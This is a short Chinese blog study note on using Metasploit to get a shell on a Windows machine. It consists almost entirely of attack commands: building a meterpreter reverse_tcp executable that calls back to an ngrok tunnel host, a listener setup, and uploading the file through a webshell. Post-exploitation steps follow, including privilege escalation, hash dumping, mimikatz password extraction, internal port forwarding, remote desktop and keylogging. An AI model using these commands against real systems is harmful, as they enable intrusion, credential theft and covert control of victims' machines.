【摘要】一、简介:Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。二、bind_tcp弹个shell:我还没写~三、revers_tcp弹个shell:sun...
一、简介:
Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。
二、bind_tcp弹个shell:
我还没写~
三、revers_tcp弹个shell:
sunny clientid 隧道id 即可启动服务 生成反弹shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.ngrok.cc LPORT=19286 -f exe > /tmp/reverse.exe Msfconsole #启动msf use exploit/multi/handler #监听 set payload windows/meterpreter/reverse_tcp #设置payload reverse_tcp set LHOST 0.0.0.0 #设置本地监听所有IP set LPORT 端口 #设置本地监听端口4444 run即可 然后上传reverse.exe至webshell 运行revers.exe 此时等待一会儿发现本机已经建立会话 getuid //发现权限较低,为user getsystem //提权 migrate pid //进程注入提权 hashdump //下载hash load mimikaz //读取明文pawd meterpreter下: shell //进入对方shell portfwd add -l 本机端口 -r 远程主机IP -p 远程主机端口 //内网转发 rdesktop a 32 127.0.0.1:本机端口 //远程链接 moudle //模块 payload //攻击载荷 msvenom //msfpayload,msfencode的结合体 msvenom -p 攻击载荷 -LHOST 本地IP -LPORT 本地端口 -f 文件格式 -o 输出目录 use exploit/multi/handler 监听模块 set payload 相同攻击载荷 set lhost 0.0.0.0 set lport 本地端口 //建立会话后 jobs 停止获取 sessions -l //列出session session -i id //进入meterpreter 之后的对于具体操作 输入-help 或 ? 即可获取帮助 比如键盘记录啊、屏幕监控run vnc等等的~
就到这里了,也可以使用background后,使用msf的exploit提权
未经允许不得转载:第一资源网 » 学习笔记 | Metasploit之弹个Shell
小东
简介:专业团队网站开发、安全运维,合作意向请联系!
发表评论